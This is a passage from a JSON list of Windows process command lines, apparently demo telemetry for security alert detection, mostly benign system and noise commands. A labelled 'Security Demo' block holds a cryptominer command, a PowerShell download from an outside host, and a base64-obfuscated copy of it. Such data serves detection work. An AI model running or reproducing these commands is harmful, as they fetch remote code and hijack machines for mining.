-Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"NaN\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"NaN\",\"cmd.exe /c c:\\\\Diagnostics\\\\WinSimulateAlerts.cmd c:\\\\W!ndows\\\\System32 2\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Begin Security Demo tasks\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\".\\\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\".\\\\powershell -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://wh401k.org/getps\\\"\",\".\\\\powershell -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdldC1Qcm9jZXNzOyBJbnZva2UtV2ViUmVxdWVzdCAtVXJpIGh0dHA6Ly93aDQwMWsub3JnL2dldHBzIg==\",\"cmd /c echo End Security Demo tasks\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\speech_onecore\\\\common\\\\SpeechModelDownload.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 8 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -10918 /22284\",\"ping 127.0.0.1 -n 17 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 0 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -15855\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15855\\\"\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6735 /25041\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11793\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -17426 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\26415\\\\9105.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18973 c:\\\\temp\\\\23899\\\\24432.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" C:\\\\diagnostics\\\\WinBenignActivity.cmd -18973 c:\\\\temp\\\\23899\\\\24432.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 14 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -17484 /10137\",\"ping 127.0.0.1 -n 14 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15720\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11278 \",\"ping 127.0.0.1 -n 14 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"rundll32 \\\\15840\\\\26443.exe\",\"ping 127.0.0.1 -n 14 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4630 c:\\\\temp\\\\25730\\\\15188.ps1\",\"ping 127.0.0.1 -n 14 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 19 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 23 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -1140 \",\"ping 127.0.0.1 -n 18 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 28 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"rundll32 \\\\18091\\\\18975.exe\",\"ping 127.0.0.1 -n 26 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -2752 c:\\\\temp\\\\12730\\\\16896.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -2752 c:\\\\temp\\\\12730\\\\16896.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 26 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1926 /21875\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -7320\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -7320\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10353 /21160\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -14766\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3438 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\29395\\\\14699.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -20237 c:\\\\temp\\\\2708\\\\27344.ps1\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18087 \",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"rundll32 \\\\24535\\\\23154.exe\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10518 c:\\\\temp\\\\25582\\\\18184.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" C:\\\\diagnostics\\\\WinBenignActivity.cmd -10518 c:\\\\temp\\\\25582\\\\18184.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 26 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -29592 /10339\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25460\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -564 \",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"rundll32 \\\\12420\\\\28156.exe\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25005 c:\\\\temp\\\\13896\\\\18724.ps1\",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 29 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 8 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 19 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 6 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -14404 /9352\",\"ping 127.0.0.1 -n 25 \",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 8 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -23146 /32625\",\"ping 127.0.0.1 -n 9 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 3 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -9090\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9090\\\"\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -20009 /26500\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -14236\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15522 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\6038\\\\18193.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -19863 c:\\\\temp\\\\5632\\\\6712.ps1\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 11 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 29 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 20 \",\"ping 127.0.0.1 -n 22 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 2 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 2 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\AppHostRegistrationVerifier.exe\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe StartScan\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 11 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -29451 /17352\",\"ping 127.0.0.1 -n 18 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 19 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -22746\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22746\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -32357 /19904\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6768\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2077 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\557\\\\12356.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -23465 c:\\\\temp\\\\11303\\\\1053.ps1\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 30 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 16 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -22744 \",\"ping 127.0.0.1 -n 26 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 12 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 6 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 1 \",\"rundll32 \\\\28294\\\\1236.exe\",\"ping 127.0.0.1 -n 24 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -27872 c:\\\\temp\\\\25394\\\\262.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -27872 c:\\\\temp\\\\25394\\\\262.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 24 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21672 /6837\",\"ping 127.0.0.1 -n 24 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2162\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2162\\\"\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9125 /15106\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22743\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9472 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\24845\\\\2750.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -30329 c:\\\\temp\\\\9676\\\\24368.ps1\",\"svchost 